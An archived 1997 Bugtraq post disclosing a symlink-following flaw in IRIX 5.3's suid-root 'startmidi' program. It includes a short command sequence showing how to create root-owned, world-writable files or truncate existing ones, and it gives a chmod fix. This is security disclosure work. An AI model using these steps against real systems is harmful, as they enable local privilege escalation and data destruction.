Home page logo
/

bugtraq logo Bugtraq mailing list archives

IRIX: Bug in startmidi
From: hedley () CS BRIS AC UK (David Hedley)
Date: Sun, 9 Feb 1997 18:11:45 +0000


Whilst browsing around the filesystem on my SGI (running IRIX 5.3), I
noticed a little suid-root program called 'startmidi' which hides in
/usr/sbin. When run, this program creates various files in /tmp. You
guessed it, it respects umask and follows symlinks. Comme ca:

% umask 0
% ln -s /blardyblar /tmp/.midipid
% startmidi -d /dev/ttyd1
% ls -l /blardyblar
-rw-rw-rw-    1 root     pgrad          0 Feb  9 17:46 /blardyblar
% stopmidi -d /dev/ttyd1
%

Any existing files are trucated to zero length. New files are created
root-owned, mode 0666. I leave it to your furtive imaginations to get
root from this. 'stopmidi' removes the files created by 'startmidi' so
you may have to run that first if /tmp/.midipid already exists.

chmod -s /usr/sbin/startmidi fixes this problem.

My apologies if this has been documented before but I couldn't find it
anywhere on file and I don't remember it being posted to this list.

Regards,

David
--
 David Hedley (hedley () cs bris ac uk)
 finger hedley () cs bris ac uk for PGP key
 Computer Graphics Group | University of Bristol | UK



  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]